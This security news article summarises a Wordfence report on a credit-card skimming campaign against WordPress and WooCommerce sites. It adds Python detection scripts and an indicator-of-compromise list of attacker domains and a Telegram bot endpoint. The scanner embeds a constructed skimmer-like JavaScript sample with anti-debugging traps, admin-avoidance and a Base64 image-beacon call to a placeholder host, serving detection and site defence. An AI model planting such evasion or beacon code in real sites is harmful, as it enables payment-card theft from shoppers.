Advanced Malware Campaign Targets WordPress and WooCommerce Sites with Hidden Skimmers


The Wordfence Threat Intelligence Team uncovered a sophisticated malware campaign during a routine site cleanup, revealing a family of malicious code targeting WordPress and WooCommerce platforms.

This campaign, which dates back to September 2023 according to the team's Threat Intelligence platform, is built on a dynamic, evolving framework with over 20 distinct samples.

Sophisticated Malware Framework

The malware variants primarily focus on credit card skimming and credential theft but also feature diverse functionalities such as malicious ad manipulation and further payload distribution.


What sets this operation apart is a novel approach: some variants embed a live backend system directly on infected websites, disguised as rogue WordPress plugins, providing attackers with a custom interface to manage stolen data and manipulate site operations.

[Figure: WooCommerce sites. Caption: plugin template was likely generated by AI]

This malware family employs advanced obfuscation techniques and anti-analysis mechanisms to evade detection, including developer tools detection, console rebinding, and debugger traps that can freeze browser tabs or halt debugging processes.

By comparing the browser window's outer and inner dimensions (outerWidth versus innerWidth), the malware infers whether developer tools are open and alters its behavior accordingly.

Technical Intricacies

The malware further disables browser shortcuts like F12 and Ctrl+Shift+I, while some variants use infinite loops to obstruct reverse engineering.

Targeting is highly selective, focusing on checkout pages and avoiding admin panels through cookie-based checks, ensuring minimal visibility to site administrators.

Data exfiltration is equally cunning, with stolen payment and billing information encoded in Base64, appended with custom schemes, and transmitted via fake image URLs to attacker-controlled servers.

Beyond skimming, certain samples manipulate Google Ads for fraud, steal WordPress login credentials, or replace legitimate links with malicious ones, demonstrating the framework’s versatility.

A standout feature is a fake human verification challenge mimicking Cloudflare branding, complete with multi-language support, animations, and dark mode CSS, designed to deceive users and filter bots.

Additionally, some variants integrate Telegram channels for real-time data exfiltration and employ localStorage for persistence across sessions.
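The anti-analysis, targeting and exfiltration behaviours described above (window-dimension checks, console rebinding, debugger traps, shortcut blocking, cookie-based admin avoidance, Base64 payloads sent via image URLs, localStorage persistence, Telegram exfiltration) are all visible in the script's source. The following static scanner is an added example written for this article, not Wordfence's signatures or any code from the report: it greps JavaScript for those traits and calls a script suspicious when several co-occur. The regexes, the threshold of three indicators and the two sample scripts (one inert skimmer-like snippet that references only the reserved `cdn.example` host and harvests nothing, one benign snippet) are all constructed for illustration.

```python
import re

# Heuristic patterns for the behaviours the article describes. These are my
# own approximations written for illustration, not Wordfence's signatures.
HEURISTICS = {
    "devtools-size-check": r"outer(Width|Height)\s*-\s*(window\.)?inner(Width|Height)",
    "console-rebinding": r"console\.(log|warn|error|info|debug|table)\s*=",
    "debugger-trap": r"\bdebugger\b",
    "infinite-loop": r"while\s*\(\s*(true|1)\s*\)|for\s*\(\s*;\s*;\s*\)",
    "shortcut-blocking": r"keyCode\s*===?\s*123|ctrlKey\s*&&\s*\w+\.shiftKey",
    "checkout-targeting": r"/checkout|wc-ajax=checkout",
    "admin-cookie-check": r"document\.cookie[^;\n]*wordpress_logged_in",
    "base64-encoding": r"\bbtoa\s*\(",
    "image-beacon": r"new\s+Image\s*\(",
    "localstorage-persistence": r"localStorage\.(setItem|getItem)",
    "telegram-exfil": r"api\.telegram\.org/bot",
}
COMPILED = {name: re.compile(pat) for name, pat in HEURISTICS.items()}

# Arbitrary, tunable threshold: a single hit (localStorage, a console shim) is
# common in legitimate code, while three or more independent traits are not.
SUSPICIOUS_THRESHOLD = 3


def scan_script(source: str) -> list:
    """Return the sorted names of every heuristic that matches the JS source."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(source))


def is_suspicious(findings: list) -> bool:
    """Decide on the number of distinct traits found, not on any single one."""
    return len(findings) >= SUSPICIOUS_THRESHOLD


# Constructed, inert sample that exercises the patterns above: it references
# no real domain, reads nothing from any form and is never executed here.
SAMPLE_SKIMMER = r"""
(function () {
  if (window.outerWidth - window.innerWidth > 160) { while (true) {} }
  setInterval(function () { debugger; }, 500);
  console.log = function () {};
  document.addEventListener("keydown", function (e) {
    if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey)) e.preventDefault();
  });
  if (document.cookie.indexOf("wordpress_logged_in") !== -1) return;
  if (location.pathname.indexOf("/checkout") === -1) return;
  var data = btoa(localStorage.getItem("cc_cache") || "");
  var beacon = new Image();
  beacon.src = "https://cdn.example/pixel.gif?d=" + data;
})();
"""

# Constructed benign sample: one localStorage read and an ordinary console.log.
SAMPLE_BENIGN = r"""
document.addEventListener("DOMContentLoaded", function () {
  var theme = localStorage.getItem("theme") || "light";
  document.body.classList.add(theme);
  console.log("theme:", theme);
});
"""

if __name__ == "__main__":
    for label, src in (("skimmer-like", SAMPLE_SKIMMER), ("benign", SAMPLE_BENIGN)):
        found = scan_script(src)
        verdict = "SUSPICIOUS" if is_suspicious(found) else "ok"
        print(f"{label}: {verdict} {found}")
```

Run it against files under `wp-content/uploads` and any inline `<script>` blocks pulled from a rendered checkout page; the threshold is the knob to tune against your own site's legitimate scripts before alerting on it.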

The use of a rogue WordPress plugin, misleadingly named “WordPress Core,” marks a significant escalation, embedding server-side PHP scripts to manage stolen data via custom post types and manipulate order statuses to “completed” to delay fraud detection.

This campaign’s complexity, with its evolving codebase and AI-generated plugin scaffolding, underscores a persistent threat to the web ecosystem.

Wordfence has responded by releasing detection signatures between May 17 and June 15, 2025, available immediately to Premium, Care, and Response customers, with a 30-day delay for free users.

Their CLI scanner and plugin detect over 99% of known samples, reinforcing a defense-in-depth approach.

Indicators of Compromise (IoCs)

Type: Indicator(s)
Domains: advertising-cdn.com, api-service-188910982.website, blastergallery.com, chaolingtech.com, contentsdeliverystat.com, deliveryrange.pro, emojiselect.info, graphiccloudcontent.com, imageresizefix.com, imagifytext.com, internetmemoryservice.com, staticdelivery.net, vectorimagefabric.com, vectorizegraphic.com
Telegram API: api.telegram.org/bot7468776395[…]chat_id=-4672047987
Google Ads Client ID: ca-pub-9514222065914327
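The IoCs above are only useful once they are run over a site. The following matcher is an added example written for this article, not part of the Wordfence report: it takes the listed domains (matching them as exact hosts or as subdomains), the visible Telegram bot prefix and chat_id (the token itself is elided in the table and is not filled in), the Google Ads client ID, and the standard WordPress plugin header line that would carry the rogue plugin's name "WordPress Core", and reports which files contain them. The sample files, their paths (including the `unknown-plugin` slug) and the `TOKEN-PLACEHOLDER` string are constructed for illustration.

```python
import re

# Indicators copied from the Wordfence IoC table above.
IOC_DOMAINS = {
    "advertising-cdn.com", "api-service-188910982.website", "blastergallery.com",
    "chaolingtech.com", "contentsdeliverystat.com", "deliveryrange.pro",
    "emojiselect.info", "graphiccloudcontent.com", "imageresizefix.com",
    "imagifytext.com", "internetmemoryservice.com", "staticdelivery.net",
    "vectorimagefabric.com", "vectorizegraphic.com",
}
IOC_STRINGS = {
    # Only the visible part of the bot URL; the token is elided in the article.
    "telegram-bot-prefix": "api.telegram.org/bot7468776395",
    "telegram-chat-id": "chat_id=-4672047987",
    "google-ads-client-id": "ca-pub-9514222065914327",
    # The article names the plugin "WordPress Core"; this is the standard
    # plugin header line that would declare that name.
    "rogue-plugin-header": "Plugin Name: WordPress Core",
}
# Loose hostname matcher; false positives like "document.createElement" are
# harmless because every candidate is checked against IOC_DOMAINS.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def find_iocs(text: str) -> list:
    """Return sorted (kind, indicator) pairs present in text.
    Hostnames hit on an exact match or as a subdomain of a listed domain."""
    hits = set()
    for m in HOST_RE.finditer(text):
        host = m.group(1).lower()
        for d in IOC_DOMAINS:
            if host == d or host.endswith("." + d):
                hits.add(("domain", d))
    for kind, needle in IOC_STRINGS.items():
        if needle in text:
            hits.add((kind, needle))
    return sorted(hits)


def scan_files(files: dict) -> dict:
    """files maps path -> content; returns only the paths with hits."""
    report = {}
    for path, content in files.items():
        hits = find_iocs(content)
        if hits:
            report[path] = hits
    return report


# Constructed sample site files (paths and contents are made up for the demo).
SAMPLE_FILES = {
    "wp-content/uploads/2025/05/inject.js":
        'var s=document.createElement("script");'
        's.src="https://cdn.staticdelivery.net/lib.js";'
        'document.head.appendChild(s);',
    "wp-content/plugins/unknown-plugin/plugin.php":
        "<?php\n/*\nPlugin Name: WordPress Core\n*/\n"
        "$u = 'https://api.telegram.org/bot7468776395XXXX:TOKEN-PLACEHOLDER"
        "/sendMessage?chat_id=-4672047987';\n",
    "wp-content/themes/shop/assets/app.js":
        "document.querySelectorAll('.add-to-cart')"
        ".forEach(function (b) { b.addEventListener('click', addToCart); });",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path)
        for kind, indicator in hits:
            print(f"  {kind}: {indicator}")
```

To use it on a real install, walk `wp-content` (uploads, plugins, themes and `mu-plugins`) and the database dump, feeding each file's contents to `find_iocs`; the plugin-header check is the quickest way to spot the "WordPress Core" plugin the article describes, since its display name is what appears in the admin plugin list.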
